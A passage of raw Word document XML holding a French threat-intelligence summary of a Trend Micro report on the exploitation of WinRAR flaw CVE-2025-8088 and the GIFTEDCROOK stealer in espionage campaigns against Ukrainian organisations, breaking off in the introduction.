            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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c12aac6f38173f94cb7228f50eb2b0fd7e45e04aedb2fc0bec2046a5df9b5fba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1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4505590</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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c75edc187b47d53ef7329f44cd025ffd1691718b65c67db7efa67a32e7c49d14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2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4682120</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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e1c5ab143114417e7e9b3c4a976b8615258d1669e95b8fc1c7116d225e2ebed1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3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4858650</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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309260f7776bf289326ff673ed1f441ac9c8ffc56eba6a7f27f25b21ab9e9270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4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5035180</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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28f58061348a1c54fa6e7ff6618630259618d4afdf78514d5fccfc993797cdff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5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5211710</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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4dee67d081780ee9b5557c5614b0736f736519dd65005e2b95bc4e29781b39fe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6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5388240</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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a835e8777531091fb39137f819be8e65536f7f653906c1ccd6acd4702d01fb8f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7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5564770</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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76f01bcc194a6ef9a1ce940f937c66aaf957e431c18f210fe8787a3af437a973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8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5741300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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4de866be72f792368ac9a1eb6a271a0edd8cccbc35ad6b9efd8ad7b690560184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99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5917830</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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c7e557cc9feb2615b132aaa8a2a756cd5461c9975186a2e7b4a609fb63b84e09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0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6094360</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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c7da0a4276b3faf7c122ab9de0ba6c7f8499f7d72aa947515a2f41e13ca4f9a6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1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6270890</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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36a4f484969a4e9037ba398e6349164643cd58cea5568534dcbb0af2c32014c5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2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6447420</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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fa00ce1f0bc4d635fe512ca6ad4e7174da1907a89b3195021286fc8da4037f63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3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6623950</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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b58e7bddd9d2fcd18e45de593bb100f732d642d78db6ac1e517b55b50a59cf44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4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6800480</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34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29849d86f50c01fc86d44ea5886a43d28604544596331c0612142261f8c1b5db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5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6977010</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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f4779667e4b25efad85bf3b73699221f935bb3377396f25b2f65e2a0fbafebea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6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7153540</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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cb4315c235bbb6ea237117ec0f9c9761203986297eec145cdd87a79816520e21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7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7330070</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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d967f3a32015fde2eb3f75f3a741dfdd02e3a9293f4ee4e10eff5c664cc9ef82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8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7506600</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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0716db7ad22fc3f039848f0bd2ea3b8efaa8ad6b2e1ea4475631fc6e317d3d2b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9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7683130</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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e0bb38fe1204c0f031d6f568bcd2ac349c39f03c8647a1b73a5d636eb55b98ad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0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7859660</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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091868a217955a41e0ff5f72b3af5afe38277ce2de1a3a42117051f94ea46787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1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8036190</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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1097080886d6c93d1cd3ec877d9640f84e765edfd813953729f934a243a04a03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2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8212720</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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70246871013e8667c9a731097eaa3628060f849bff08373af83c00edddab1a82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3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8389250</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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116172d0d4407bc2a3a5e03b9f45dee3927d2bb6adf54eaba1c0cf3b38bd03c1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4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8565780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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ef239b58b6bae3034b66274ca5d377bc66bc2b8293472774558d259d8417871c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5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8742310</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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0ef18003a27165cea2a6dffbf003baacbf3d4028dd822e3b51d4136945666fea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6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8918840</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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76bb6dcd27672ec31d71e19d391ae8b5ac20916e545159a05effdea1faca40bf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8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9095370</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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b269abc52c16c97eca56a88c19d9c14f00e1366383f7f20197a8f395e323df87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9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9271900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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fce886ffdb574fdfadc926f78b4f044d5152613bc8b544960538fdce1db19be0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0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9448430</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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677e3bb8130e65dec6b3397a7d45fb35cb94385c500559a1332063c1e04e8786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10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5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211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5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31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5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416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5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518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5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72620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5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723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5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8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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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0d7e4daf4abc91e43753ccd181ab7926158088cc75201ad141d07abbc3644b00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9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942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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2eedbe83a90856b583980e8a8318e9c3cf87712634b77d88046ffedddd5a07be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0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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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0f896746da43ee8000ab5dd66bf47edbd1160f814b96b095fdc3c11ff2272fda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1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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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3f4b0eee0f879b91811b5307aea1311faec7a364f9bb6f0aabe8cecd77982ae7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2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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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815774fe0691bfb638f0abab56b226a901d9bee98bbe0bebf7b1bfba2332cc87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3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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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7f35c860275e5eb45e9a9e2fa29a7f8b0b6cf5aaa81413a65841aaf192f5f274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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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641ce7be635d14fdb51fb5c570f445aaa2029111541a320e5c71cc25f4c98a7e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5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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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5905b9d78a5f417d5462b955eeef1bdc6710062f6e0e769c9b4cf0c6954f2ba9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6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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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d80d5f07e268d876cfc91395f6e6fb65e0a39fc2c5055424805b2d497175cd82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7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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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57c523a45892a33f23194d15fa2f0e061d3a7113d2983d2c82b10624a83e856b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8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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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33f432cd15e8d96dabffc8eb651aa07c10c6375594c21d394162c0f191aa0ea8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9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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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57d5ffec6ef62e6578f5f332c1f30eb854848e6cbe4211cc4a164525824e0188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0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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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b6a008c8c7929a745b64b95bcee8609330bb5a28a1a24319c9cf3812398ed5ae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1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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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af18619029f32ca81fcf835df777060550ab8ef154777e5b36cd5396d69ce53e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2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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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4ed213a38f1459bdc442186055172b97ef08a3636a8f8bd9f956b469f29bc49e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3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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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48eaa5ba5573dc9fbba6a25a70bd5ac8165377dfec02e9fe0ee067e5efe15780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4640" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6576936</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3602620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="112807" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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80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69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5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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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f917143fa80ca9efa352873249a4e41dca56bfaaa3f8c9aa912a8172849fc31c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6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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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8797c0d6e1d11c818dd94818c44b2b775e5b3e1b81435f265806b6cdf0e335b0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7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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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12a3e81a485ae37bb2c4c95d50cbd4133751dcaeea443c40f99d200822c62b17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8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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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072025368be824b94e01773f42554218a4a10d98055ab6e7f515ae60f3ae30c1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9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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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f3e615b7e55edfce435e37fe6c6ebb831a605420f2271ce1280e55eaaacca112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0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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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a9c668e2900b14fd02f3431a4099a8d49f6095b79c74a66161dcbac89ce28e73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1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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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be18c171db85261b9f0a3e2e7f3cae28afe67317f55afe2adbc6045fd08be4f3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2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5014860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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8797c0d6e1d11c818dd94818c44b2b775e5b3e1b81435f265806b6cdf0e335b0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3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5191390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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ab4c80c2415131d0c87944fe93c1e7b6fa26a301761faa315d3aa4c13493ee34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4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5367920</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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e8b8c11cb9f6b68ffec68f7a972b50c89a3bd76c9c92919710fb80d877160c36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5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5544450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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7c035a1fedf3a19bb4bf550f2c8a34f080aca8e5106daac587c41e6142ef26ca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6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5720980</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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791780f763100906295591a3fec4fffdfd0dea83b3f987f3c956dcce24c29798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7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5897510</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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349db607063210d83ba4507a157041f71c7c3ea8d0b36116d8bb427d5dea47ec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8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6074040</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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718f0b5160ba4345f9bd48bc82ac717924d89f82ecdb7c0c8d15ce72febcd122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0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6250570</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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eb5b170fc8c4ac7a91ae83f7b75fdebbcb74e3e99f0b1074e6802959c23be8b1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1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6427100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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3eaef2c29a9003c3d3eef0c379be427af9bd0c08337177311c21fce0d2d3137f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2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6603630</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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5a8399c8e6e2c62245404e8864615fc00c9fc2f3f0bbc368caf9823097cc7822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3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6780160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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151953a8944e83b033926505f106b24b3cd5c07e16fb08f7556cc419f93d3ddf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4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6956690</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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fcedce79de7a306d2421781309c0e0caa979ffbfd770fe2d16c6dc0272f74568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512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614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71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819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921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77126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9581524</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1828800" cy="6349"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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228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331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4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947310</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5459007" cy="233164"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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9007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[UAC-0226] Une ancienne faille de WinRAR alimente les attaques contre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5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1198770</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4954263" cy="233164"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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426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l'Ukraine, comment les logiciels non gérés laissent la porte ouverte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638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1565298</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606933" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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5"/>
                          </w:rPr>
                          <w:t xml:space="preserve">8 juin 2026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: Analyse de deux campagnes utilisant la CVE-2025-8088 contre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740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1738653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2812349" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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234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organisations ukrainiennes par Trend Micro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8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2288563</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1098858" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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88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Vue d’ensemble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945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2563518</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5607568" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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7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Victomologie : Administrations ukrainiennes, organismes gouvernementaux,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0480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2736873</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5378333" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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8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personnel militaire, personnels liés à la mobilisation, utilisateurs manipulant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150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2910228</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3201857" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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018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documents administratifs ou militaires en ukrainien.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2528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3185183</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606933" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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Arsenal :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Spear phsihing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CVE-2025-8088, archives WinRAR piégées, fichiers LNK,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3552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3358538</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1758360" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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83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chargeurs, GIFTEDCROOK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457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3633493</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5491780" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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17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Objectif principal : Cyberespionnage et collecte rapide d'informations opérationnelles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5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4183403</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1145638" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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56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Résumé exécutif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6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4456453</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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La vulnérabilité CVE-2025-8088, une faille de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 path traversal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affectant WinRAR et corrigée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7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4640603</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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juillet 2025, continue d’être exploitée dans le cadre de campagnes d’intrusion visant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8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4824753</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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l’Ukraine. Plusieurs acteurs ont été observés utilisant cette vulnérabilité, notamment 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9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5008903</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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groupe que désigné provisoirement par Trend Micro sous le nom de SHADOW-EARTH-066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0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5193053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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ainsi que des acteurs alignés sur les intérêts russes, dont Gamaredon. Les analyses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1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5377203</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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montrent que ces groupes ont continué à produire de nouveaux échantillons exploitant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2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5561353</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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faille au moins jusqu’en avril 2026. Au moment de la rédaction de ce rapport, les activités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3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5745503</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1991916" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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19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Gamaredon demeurent actives.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4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6018553</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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SHADOW-EARTH-066, suivi par le CERT-UA sous l’identifiant UAC-0226 depuis 2025, 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5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6202703</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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parallèlement déployé une version mise à jour du voleur d’informations GIFTEDCROOK. Cet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6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6386853</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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outil est conçu pour mener des opérations rapides de collecte de données et cible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7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6571003</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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notamment les identifiants enregistrés dans les navigateurs, les cookies de session ainsi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8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6755153</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4289562" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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95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documents correspondant à 35 extensions de fichiers différentes.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9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7028203</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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L’évolution des capacités techniques de cet acteur apparaît particulièrement marquée.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0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7212353</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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moins d’un an, ses opérations sont passées de campagnes relativement simples reposant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1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7396503</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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sur des macros Excel et une exfiltration des données via Telegram en clair à des chaînes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3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7580653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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d’exploitation basées sur CVE-2025-8088, au chargement furtif de DLL directement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4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7764803</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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mémoire à l’aide d’appels système NT et à l’utilisation d’une infrastructure de commande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5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7948953</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1068080" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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80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contrôle chiffrée.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6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8222003</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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Cette campagne met également en évidence un problème structurel de gestion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7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8406153</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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vulnérabilités. Contrairement à de nombreux logiciels d’entreprise, WinRAR n’est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8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8590303</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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généralement pas administré par des stratégies de groupe ni intégré aux mécanismes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9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8774453</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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centralisés de mise à jour. Les applications présentant ces caractéristiques restent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0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8958603</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="35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fréquemment vulnérables longtemps après la publication de correctifs, créant ainsi un angle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1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9142753</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3753952" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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395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mort durable dans la surface d’exposition des organisations.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2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5374296" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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429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37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https://www.trendmicro.com/en_us/research/26/f/old-winrar-flaw-fuels-attacks-on-ukraine.html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324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6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427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529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632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6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734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6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81836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7397124</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="334009"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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340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3400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34009"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="33400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939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6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041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6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1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1233828</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="656568" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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Synthèse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2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1769777</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1620847" cy="262867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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0847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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">1. Introduction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3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2224428</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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Lorsque la Russie a annexé la Crimée en 2014, le paysage des cybermenaces liées à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4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2408578</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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Russie était caractérisé par une poignée d’acteurs connus : APT28, Sandworm, APT29,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5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2592728</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="36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Turla et Gamaredon. Une décennie plus tard, ces groupes restent actifs, mais ils ont été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6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2776878</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
